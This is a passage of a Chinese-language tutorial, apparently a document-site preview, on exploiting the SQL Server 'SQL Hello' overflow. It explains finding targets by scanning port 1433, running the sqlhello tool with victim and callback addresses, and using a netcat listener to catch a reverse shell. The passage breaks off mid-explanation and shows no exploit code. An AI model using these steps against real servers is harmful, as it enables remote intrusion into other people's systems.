版权说明:本文档由用户提供并上传,收益归属内容提供方,若内容存在侵权,请进行举报或认领
文档简介
1、题目:sql hello exploit 漏洞的利用一介绍:SQL Server是微软对抗Oracle推出的数据库。占领的市场份额已经仅次于Oracle,居世界第二,但是其安全性也一直受到用户的置疑。从1996年,微软公司推出的SQL Server 6.5版本到1998年推出的SQL Server 7.0,以及2000年8月推出了SQL Server2000,还有后来新出的SQL Server2005。在版本和功能不断升级的情况下,安全问题却没有得到很好的改善。不断发布针对SQL Server的安全公告和补丁。2003年1月24日,针对SQL Server的“Slammer”的蠕虫在Inter
2、net上肆虐,导致网络流量激增,严重影响了世界范围内的计算机和网络系统。SQL Server的漏洞引起了各大安全公司和厂商的重视,因此NFR也立即发布了多个针对SQL Server的攻击签名。但是在使用过程中,发现NFR针对漏洞的报警非常多。这个漏洞是针对SQL Server数据库来的,SQL Serve数据库是微软公司推出的,应用非常广泛。二、扫描是通过端口:1433端口。现在告诉大家应该怎么能找到这个有SQLhello这个漏洞的主机,这个漏洞没有什么专用的扫描软件,扫描之后它会显示哪个存在哪个不存在。扫描一般来说有两种方式,一种是通过专有的扫描工具,另一种是通过端口来判断它的服务,通过它的
3、服务来推进它的漏洞。今天我们就通过第二种手段来,主要就是通过它的端口来判断它的服务,通过它的服务来推进它的漏洞。这个是什么意思,就是这个网站它是否存在漏洞,要注意几个问题:首先扫描它一个端口,就拿sql server这个漏洞来说,首先扫描它的1433这个端口,看这个端口是否开放,要是开放我就可以断定它安装了sql server服务,安装了这个服务之后,我们就可以进行相应的漏洞进行溢出。如果它不安装这个sql server这个数据库,咱们就不可能对它进行溢出,前提条件是它开放了1433端口,它不开这个1433端口就没法对它进行远程溢出,我们现在要做的事情不是扫描主机,看哪台主机开了1433端口。
4、它有没有漏洞我们并不知道,所以要经过第三部的验证。对它进行溢出,看它是否能溢出成功。 三、溢出,两个程序一个是正向溢出一个是反向溢出。首先我们使用反向连接来给大家演示。nc l p 端口在本地监听一个端口等待对方来连接SQL Hello Exploit - Remote Shell Callback by JoePub这里是注释,就是谁写的sqlhello victimip victimport callbackip callbackport程序名 这个是IP 这个是端口 IP端口反向连接的概念,要有一个目标主机的IP和端口,还要填写上自己的IP地址和端口,还要用NC进行监听。victimip
5、 Address of host to send exploit payload这里的英文写着地址,就是要攻击的目标主机IPvictimport Port to attack on victimcallbackip Address of host to callback on succesful exploitcallbackip Port to connect to on callback IPsqlhello 目标主机IP 目标主机开放端口1433本机IP本机端口向目标主机的IP的1433端口发送溢出程序,发送溢出程序之后,对方就是目标主机的溢出程序,有什么功能呢,它可以自动连接到这个IP的端口,远程的返回我们的IP正向连接正向溢出虽然简单,但有缺点,有可能会被防火墙拒绝。反向溢出是对方
温馨提示
- 1. 本站所有资源如无特殊说明,都需要本地电脑安装OFFICE2007和PDF阅读器。图纸软件为CAD,CAXA,PROE,UG,SolidWorks等.压缩文件请下载最新的WinRAR软件解压。
- 2. 本站的文档不包含任何第三方提供的附件图纸等,如果需要附件,请联系上传者。文件的所有权益归上传用户所有。
- 3. 本站RAR压缩包中若带图纸,网页内容里面会有图纸预览,若没有图纸预览就没有图纸。
- 4. 未经权益所有人同意不得将文件中的内容挪作商业或盈利用途。
- 5. 人人文库网仅提供信息存储空间,仅对用户上传内容的表现方式做保护处理,对用户上传分享的文档内容本身不做任何修改或编辑,并不能对任何下载内容负责。
- 6. 下载文件中如有侵权或不适当内容,请与我们联系,我们立即纠正。
- 7. 本站不保证下载资源的准确性、安全性和完整性, 同时也不承担用户因使用这些下载资源对自己和他人造成任何形式的伤害或损失。
最新文档
- 商业地产买卖合同范本
- 饲料购销合同范本
- 塔吊租赁与安装合同
- 校服采购供应合同
- 国防物资订购协议书案例
- 专业林业承包合同范本
- 购销装饰布艺
- 法庭保证陈述无误
- 保温材料招标公告模板
- 居间房地产居间合同
- 稀土发光材料的发光机理及其应用
- 2024江苏地区“三新”供电服务公司招聘600人高频考题难、易错点模拟试题(共500题)附带答案详解
- 初级经济师(初级建筑与房地产经济)题库【重点】
- 苦参抗菌谱及耐药性研究
- 病情变化及抢救配合
- 医院药品采购相关培训
- 福建省师范大学附属中学2023-2024学年化学高一下期末考试试题含解析
- 初二家校共育策略
- 八路军西安办事处纪念馆
- 蜜雪冰城的分析
- 数字化转型:小学语文教育的新篇章
评论
0/150
提交评论